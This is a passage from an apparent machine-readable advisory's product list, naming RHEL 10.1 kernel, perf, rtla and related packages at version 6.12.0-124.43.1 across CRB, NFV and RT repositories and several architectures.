"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
